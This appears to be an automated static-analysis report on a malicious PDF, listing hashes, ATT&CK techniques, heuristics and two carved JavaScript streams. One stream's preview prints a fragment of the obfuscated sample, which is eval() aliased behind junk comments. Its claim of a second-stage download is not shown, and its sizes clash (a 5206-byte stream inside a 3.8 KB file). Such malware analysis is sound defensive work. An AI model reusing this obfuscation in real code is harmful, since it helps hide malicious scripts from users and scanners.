Malicious PDF — malware analysis report

Static analysis result for SHA-256 60168031c87b6d9c…

Verdict: MALICIOUS
File type: PDF
Size: 3.8 KB
MD5: dccb1f12839e6d23b14fbc9eb64b9321
SHA-1: dfbfd45418d4a6efb29451024508080d29ab1e67
SHA-256: 60168031c87b6d9caa18ce7cd7ea50512493ee9adb52af34919498b31a2459ad
Risk Score: 156

Malware Insights

MITRE ATT&CK
  • T1059.007 JavaScript
  • T1203 Exploitation for Client Execution

The PDF file contains embedded JavaScript streams that are heavily obfuscated and utilize eval() and String.fromCharCode() for execution. The critical PDF_JS_EXPLOIT_CLUSTER heuristic indicates a known exploit pattern. The embedded JavaScript is designed to download and execute a second-stage payload, as evidenced by the heuristic firings and the nature of the script content.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (4)

  • JavaScript action (severity: low, 2 related findings, rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical, rule: PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream (severity: low, rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact (severity: info, rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: javascript_obj111711_000.js
SHA-256: 6df1f3dcb55caf821b05c3cbbb423b0efe371aa7bed290634e3a35e8df494300
Kind: pdf-javascript-stream
Source: PDF /JS object 111711 at offset 0x197
Size: 372 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/ eval('/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/hlhtetk/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/=/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/eval;/*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/'); /*fGhkjkDFhkhsfd <FDSJHFhkjkjSDFkj> FDKLFJHklfkldshfSLDf*/
Filename: javascript_obj111712_001.js
SHA-256: 6daa439336a30a8347c7fde75caec04ce7b1144b4e3759318b3f051961ee507a
Kind: pdf-javascript-stream
Source: PDF /JS object 111712 at offset 0x248
Size: 5206 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script